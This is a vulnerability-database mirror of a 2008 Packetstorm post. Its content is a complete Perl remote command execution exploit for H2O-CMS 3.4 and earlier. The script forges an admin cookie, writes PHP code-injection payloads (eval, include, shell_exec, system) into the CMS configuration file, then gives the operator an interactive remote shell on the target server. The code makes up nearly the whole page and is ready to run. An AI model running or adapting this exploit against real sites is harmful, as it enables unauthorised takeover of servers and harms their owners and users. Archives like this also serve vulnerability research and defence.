Lucene search

K

h2ocms-exec.txt

🗓️ 28 Oct 2008 00:00:00Reported by StAkeRType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

h2ocms Remote Command Execution Exploi

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#!/usr/bin/perl   
# ----------------------------------------------------------   
# H2O-CMS <= 3.4 Remote Command Execution Exploit (mq = Off)  
# Discovered By StAkeR[at]hotmail[dot]it  
# Download On http://sourceforge.net/projects/h2o-cms  
# ----------------------------------------------------------   
  
use strict;  
use LWP::UserAgent;  
use LWP::Simple;  
  
my $post;  
my $sysc;  
my $host = shift or athos();  
my $auth = "user=admin&id=1&admin=1";  
my $http = new LWP::UserAgent;  
  
my $write = {  
'site_title' => '";""; error_reporting(0); echo"//athos"; "',  
'db_server' => '";""; include($_REQUEST["i"]); "',  
'db_name' => '";""; eval($_REQUEST["g"]); "',  
'db_username' => '";""; echo shell_exec($_REQUEST["c"]); "',  
'db_password' => '";""; echo system($_REQUEST["s"]); "',  
'save' => 'Save',  
};  
  
  
$http->default_header('Cookie' => $auth);  
$post = $http->post($host.'/index.php?option=SaveConfig',$write);  
  
  
sub start_exec  
{   
my $site = shift @_;  
my $exec = shift @_;  
my $view = get($site.'/includes/config.php?c='.$exec);  
  
return $view;  
}   
  
sub athos  
{  
print STDOUT "# Usage: perl $0 http://[host]\n";  
print STDOUT "# Remote Command Execution Exploit\n";  
exit;  
}  
  
unless(get($host) =~ /\/\/athos/i)  
{  
print STDOUT "# Exploit Failed!\n";  
exit;  
}  
else  
{  
while(1)  
{  
if(defined start_exec($host,$sysc))  
{  
print STDOUT "[athos-shell] ~# ";   
chomp($sysc = <STDIN>);  
  
print STDOUT "[athos-shell] ~# ".start_exec($host,$sysc)."\n";  
}   
}  
}  
  
__END__  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
28 Oct 2008 00:00Current
7.4High risk
Vulners AI Score7.4
17
.json
Report